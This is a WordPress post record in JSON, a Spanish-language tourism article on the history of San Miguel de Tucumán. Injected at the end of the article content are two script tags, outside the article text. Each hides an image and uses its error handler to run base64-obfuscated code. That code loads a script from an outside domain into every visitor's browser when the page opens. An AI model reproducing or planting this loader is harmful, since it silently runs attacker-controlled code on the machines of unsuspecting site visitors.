{"id":2082,"date":"2023-01-11T12:01:30","date_gmt":"2023-01-11T15:01:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2082"},"modified":"2025-08-14T00:25:32","modified_gmt":"2025-08-14T03:25:32","slug":"si-andas-de-turismo-por-el-norte-argentino-tenes-que-conocer-la-historia-de-tucuman","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2082","title":{"rendered":"Si andas de turismo por el norte argentino: Tenes que conocer la historia de Tucum\u00e1n"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#05832d\"><em><strong>Ning\u00fan visitante puede pasear por Tucum\u00e1n sin saber que el mismo suelo que pisan al recorrerla, fue el que pisaron los congresales en 1816 para declarar la independencia del poder espa\u00f1ol en la Casa Hist\u00f3rica. Pero para llegar a ese d\u00eda hist\u00f3rico, hay que ir un poco m\u00e1s atr\u00e1s.<\/strong><\/em><\/h4>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"868\" height=\"566\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/Congreso-de-Tucuman-1816.jpg\" alt=\"\" class=\"wp-image-2084\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/Congreso-de-Tucuman-1816.jpg 868w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/Congreso-de-Tucuman-1816-300x196.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/Congreso-de-Tucuman-1816-768x501.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/Congreso-de-Tucuman-1816-696x454.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/Congreso-de-Tucuman-1816-644x420.jpg 644w\" sizes=\"(max-width: 868px) 100vw, 868px\" \/><\/figure>\n\n\n\n<p>San Miguel de Tucum\u00e1n fue fundada dos veces. La primera fue en 1565 por Diego de Villarroel en un lugar conocido como \u201cIbat\u00edn\u201d. Y la segunda, en 1685, por Fernando Mate de Luna, en un sitio llamado \u201cLa Toma\u201d, cercano al margen derecho del R\u00edo Sal\u00ed.<\/p>\n\n\n\n<p>La ciudad comenz\u00f3 a crecer a pasos agigantados y ya en el siglo XIX, hacia la d\u00e9cada del 70, lleg\u00f3 el ferrocarril.<\/p>\n\n\n\n<p>En un pa\u00eds en el que la inmigraci\u00f3n fue ultra masiva, San Miguel no fue la excepci\u00f3n. Durante el siglo XIX y el XX, espa\u00f1oles, \u00e1rabes, jud\u00edos e italianos incidieron en la arquitectura, que fue dejando de lado el estilo colonial para construir el neoclasicismo, eclecticismo y pintoresquismo en su reemplazo.<\/p>\n\n\n\n<p><strong><em>Al hablar de la ciudad, dos fechas son imprescindibles.<\/em><\/strong><\/p>\n\n\n\n<p>\u00a0La primera, el 24 de septiembre de 1812, cuando el general Manuel Belgrano (tambi\u00e9n creador de la bandera argentina) venci\u00f3 a las tropas de P\u00edo Trist\u00e1n en la conocida Batalla de Tucum\u00e1n. Y la segunda, la m\u00e1s importante para todo el pa\u00eds, el 9 de julio de 1816, cuando la Casa Hist\u00f3rica de la ciudad fue la sede de la declaraci\u00f3n de la Independencia argentina.<\/p>\n\n\n\n<p>En los primeros a\u00f1os de 1900 se incorporaron a la ciudad 400 hect\u00e1reas destinadas a parque y se conform\u00f3 el primer espacio verde de magnitud similar a los grandes parques de Par\u00eds y Londres. Eran los primeros pasos para que San Miguel fuera lo que es: el Jard\u00edn de la Argentina. Durante el siglo XX, la ciudad sigui\u00f3 creciendo e incorpor\u00f3 los edificios en altura.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.tucumanturismo.gob.ar\/informacion\/8\/39\/historia\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/Captura-web_11-1-2023_115535_www.tucumanturismo.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-2083\" width=\"317\" height=\"54\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ning\u00fan visitante puede pasear por Tucum\u00e1n sin saber que el mismo suelo que pisan al recorrerla, fue el que pisaron los congresales en 1816 para declarar la independencia del poder espa\u00f1ol en la Casa Hist\u00f3rica. Pero para llegar a ese d\u00eda hist\u00f3rico, hay que ir un poco m\u00e1s atr\u00e1s. San Miguel de Tucum\u00e1n fue fundada [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2085,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9],"tags":[],"class_list":{"0":"post-2082","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2082"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2082"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2082\/revisions"}],"predecessor-version":[{"id":7208,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2082\/revisions\/7208"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2085"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2082"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2082"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2082"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}